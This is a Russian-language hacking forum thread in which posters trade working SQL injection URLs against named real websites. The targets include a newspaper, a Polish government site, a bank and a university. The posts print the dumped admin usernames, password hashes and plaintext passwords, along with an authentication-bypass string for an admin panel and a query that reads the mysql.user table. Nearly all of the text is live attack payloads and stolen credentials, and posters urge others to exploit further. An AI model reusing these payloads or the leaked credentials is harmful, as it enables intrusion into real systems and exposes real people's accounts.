SQL Инъекции

Официальный сайт клуба "Бодрость"

Code:

http://www.bodrost.h1.ru/results.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6/*

[email protected]
4.0.18
p.s: я не стал подбирать таблици, т.к. сайт сильно тормозит =(

 

nvsaratov.ru - газета "Новые Времена"
случайно наткнулся на сей сайт...

Code:

http://[COLOR=YellowGreen]nvsaratov.ru[/COLOR]/default.php?go=show&id=4887&paper_id=1'+union+select+1,2,3,4,version(),6,user(),8,9,10,11/*

4.1.22-log [email protected]
думал се... а нет. тыкнув кавычкой в админке вылезла ошибка:

из которой сразу видны таблица и колонки =)

Code:

http://[COLOR=YellowGreen]nvsaratov.ru[/COLOR]/default.php?go=show&id=4887&paper_id=1'+union+select+1,2,3,4,concat(login,char(58),pass,char(58),email,char(58),name),6,7,8,9,10,11+from+__admin/*

webmaster:824dbff1455fe6ed2d753200a889fbb1:[email protected]:Новые времена
admin:0b944a04224b108c29b460245a13664e:design@overta:Администратор
собсно расшифровывать пароли мы не будем... а исходя из вышеупомянутой ошибки, составим запрос =)

Code:

0b944a04224b108c29b460245a13664e' AND is_encoded=1) OR (pass='12345' AND is_encoded=0)) LIMIT 1/*

куда его вставлять додумывайте сами... вуаля мы в админке =) п.с. информация о уязвимости была отправлена

 

БД 4...перебором нашёл мемберов

HTML:

http://www.gilbo.ru/index.php?page=liderlist&art=-1255'+UNION+SELECT+1,2,concat(nick,0x3a,pass),4,5,6,7+FROM+members+limit+1,1/*

Админка

HTML:

http://www.gilbo.ru/admin.php

 

EEстонский JaZZ
www.jazzkaar.ee

Code:

http://www.jazzkaar.ee/eng/news.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users+--+

4.1.13-Debian_0.dotdeb.0-log

Code:

http://www.jazzkaar.ee/eng/news.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,password),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users+limit+0,1+--+

Есч0 и сбрутил =)

Code:

testuser:179ad45c6ce2cb97cf1029e212046e81:testpass  
kasutaja:878e9103c2f839fab4027a12b1b33e8c:kasutaja

Идем дальше..

ПОЗОР ДНЯ

Корпорация ЮНИ

Специализация: Информационные технологии и Информационная Безопасность.

www.uni.ru

Code:

http://www.uni.ru/news.php?action=show_event&id=-1+union+select+1,2,3,4,5,6,7,8,9,version(),11,12+--+

5.0.26-standard-log
Табла users.
Столбцы:
uid
user
password

Code:

http://www.uni.ru/news.php?action=show_event&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,uid,user,password),11,12+from+itg.users+--+

Code:

2:itg:zQ34hPx9

Дальше..

ONLINE JOBS
www.onlinejobs.ru

Code:

http://onlinejobs.ru/comment.php?ID=-1+union+select+1,version(),3,4,5+--+

5.0.22
Удобный вывод всех таблиц.

Code:

http://onlinejobs.ru/comment.php?ID=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+--+

Интересные:
admins
adminip
users

Code:

http://onlinejobs.ru/comment.php?ID=-1+union+select+1,concat_ws(0x3a,id,name,pass,mail,admins),3,4,5+from+jobsmarket_job.admins+--+

Code:

1:adminyu:1q2wasdfre:[email protected]:0

 

Рейтинг серверов Linage II

http://top.l2info.net/index.php?go=in&id=279 and 1=2 union select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.tables/*

 

http://onlinejobs.ru:2222/CMD_LOGIN - админка, но пароль не подошел

 

Code:

http://www.cyberbrest.com/index.php?page=files&id=-1+union+select+1,2,3,4,5,concat_ws(char(0x20,0x3a,0x20),login,password,email),7+from+user/*

 

www.abruzzoverdeblu.it

Code:

http://www.abruzzoverdeblu.it/?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,database(),0x3a,user(),0x3a,version(),0x3a),7,concat(username,0x3a,password),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+abruzzov_db.utenti/*

Расскрутил до конца!!!
admin : bluver02
а админку не нашёл =)))
abruzzov_user1@localhost
5.0.45-community
abruzzov_db

 

HTML:

http://www.phuket-estate.com/search.php?hot=999999'

HTML:

http://www.phuket-estate.com/search.php?hot=999999'+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,convert(concat(USER(),char(58),VERSION())+using+latin1),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,convert(concat(DATABASE(),char(58))+using+latin1),50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69/*

70 столбцов...
USER:[email protected]
DATABASE:jeab690_AMRE
VERSION:4.1.14-log

 

Code:

http://www.dizelist.ru/index.php?id=-7+union+select+1,version(),concat_ws(0x2F,id,name,password),4,5,6,7+from+ds_dizelist_users/*

Version : 5.0.45-log/[email protected]/u59144

Admins:

Id / Name / Password

1/Dizelist.RU/Administrator123
2/Тарас/tarikpassword
3/VE/9505111
4/dizel/9112014
5/Nicolay/456123
6/Юрий/30055691

 

http://www.eduvluki.ru

Code:

http://www.eduvluki.ru/metod/level2.php?id=-178+union+select+concat_ws(0x3a,user_login,user_passwd)+from+arc_users/*

Админка

Code:

http://www.eduvluki.ru/admin/

 

Эх, Италия ...

pigot4.it

Code:

http://www.pigot4.it/testi-canzoni-gratis/cantanti.php?cantante=-1+union+select+1,concat_ws(0x3a,version(),database(),user())/*

4.1.19-community-nt:testicanzoniit154:WA_012988@localhost

Админ [ логин : пасс ]:

Code:

Pigot4 : LmrscA90t

------------------------------------------------------------------------

Powered by: Cowgar Racing's Apache Portal. It's CRAP!!! - gameрские сайты

Примеры:

[1.] fierojoe.com :

Code:

http://www.fierojoe.com/index.php?func=plugins&p=classifieds&go=item_details&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,version(),database(%20%20%20),user())/*

5.0.42-log:fierojoe_new:fierojoe@localhost

116 таблиц:

Code:

http://www.fierojoe.com/index.php?func=plugins&p=classifieds&go=item_details&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,table_name+from+information_schema.tables+limit+115,1/*

Наши табы и нужные акки в них:

Code:

crap_email_list
crap_host_users       fierojoe : fe565f575eebcc06e65b5cc51667c368 [ fierogt ]
crap_users            admin : 87ee82c2af7fbd7ecf7bcd7b73b4afb1
j_users               fierojoe : fierogt

[2.] ricewarsthegame.com

Code:

http://www.ricewarsthegame.com/index.php?func=plugins&p=links&go=sub_list&cat_id=-1+union+select+1,concat_ws(0x3a,version(),database(%20%20%20),user())/*

5.0.42-log:ricewars:ricewars@localhost

63 таблицы:

Code:

http://www.ricewarsthegame.com/index.php?func=plugins&p=links&go=sub_list&cat_id=-1+union+select+1,table_name+from+information_schema.tables+limit+63,1/*

Нам нужна таба mantis_user_table

Сайт группы: _http://crap.cowgarracing.com/index.php
Админский акк вероятно:

Code:

admin : 87ee82c2af7fbd7ecf7bcd7b73b4afb1

------------------------------------------------------------------------

gov

radom.rdlp.gov.pl

Code:

http://www.radom.rdlp.gov.pl/index.php?id=10&a=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7/*

5.0.32-Debian_7etch1-log:rdlp_radom_pl:rdlpradom@localhost

Админ [ логин : пасс ] :

Code:

paneLBiP : panelbIp,

но админку не нашёл

 

Code:

http://www.alliancepermanentaccess.eu/index.php?id=-1+union+select+1,id,username,password,5,6,7+from+users+limit+3,2/*

database: alliancepermanentaccess

user: [email protected]

version: 5.0.22-community-nt

в базе всего 4 пользователя:

1)login:Hans Jansen
password:jansen

2)login:Ingrid Dillo
password:dillo

3)login:Bert Bulder
password:bulder

4)login:KirstenvH (может добавлять и редактировать новости)
password:hulsen

 

www.totalgameplay.com

Code:

http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,version(),5,user(),7,8,database(),10,11/*

4.1.22-standard-log

tgp_sysclie@localhost

tgp_gamedb
_______________________________________

При запросе

Code:

http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(table_schema,0x3a,table_name),10,11+from+information_schema.columns+where+column_name=0x70617373776F7264/*

Получается

Code:

SELECT command denied to user 'tgp_sysclie'@'localhost' for table 'columns'

Попробуйте ктонибудь дораскрутить...

www.kursor-trans.com

Code:

http://www.kursor-trans.com/news.php?id=-1+union+select+1,2,user(),version()/*

4.1.22-standard

kursor_alex@localhost

 

Bank Of Baku

 

HTML:

http://trizland.ru/task.php?id=9999

HTML:

http://trizland.ru/task.php?id=9999+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE(),0x3a),3,4,5,6,7,8/*

USER:[email protected]
VERSION:4.1.18
DATABASE:bin17www

 

www.crim.ncsu.edu/

Code:

 http://www.crim.ncsu.edu/project_detailed.php?id=-1+union+select+1,2,3,concat(user_login,0x3a,user_pass),5,6,7,8,9,1,2,3,4,5,6,7,8+from+wp_users+limit+0,1/*

admin:75bb40f591c0db371aba50f65741d73f

 

Немнога доработал

Code:

http://www.bankofbaku.com/rus/news.php?id=-15'+union+select+1,2,load_file('/tmp/123.php'),4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x2F,user,password)+from+mysql.user/*

admins

root/60f57c4813f45b5f
orxanx/3d43b7262348c8c8

 

Code:

http://www.[COLOR=Olive]seacoastrugby.org[/COLOR]/news.php?id=-123+union+select+1,2,concat_ws(char(58,58),user(),database(),version()),4/*  

rugby@localhost::seacoast::5.0.27

Code:

http://www.seacoastrugby.org/news.php?id=-123+union+select+1,2,concat_ws(char(58,58),username,email,password),4+from+mos_users/*  

admin::[email protected]::f749b2d0d046218a980aa301950d6aa7

 

Code:

http://socstudikantiani.fls.unipi.it/index.php?id=-1+union+select+1,2,3,user(),5,version(),7,8,9,10/*

Code:

http://rba-optima.com/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

Что за??

Code:

http://www.dualtime.ru/category.php?id=-1+union+select+1,2,3/*

и

Code:

http://www.mywatches.ru/category.php?id=-1+union+select+1,2,3/*

и

Code:

http://www.atlantic-time.ru/category.php?id=-1+union+select+1,2,3/*

что за?
________________________________________

www.korsteklobor.ru

Code:

http://www.korsteklobor.ru/category.php?id=-1+union+select+1,concat(login,0x3a,password),3+from+user/*

тут всё сделал =)
логин: korsteklobor
пасс: krstklbr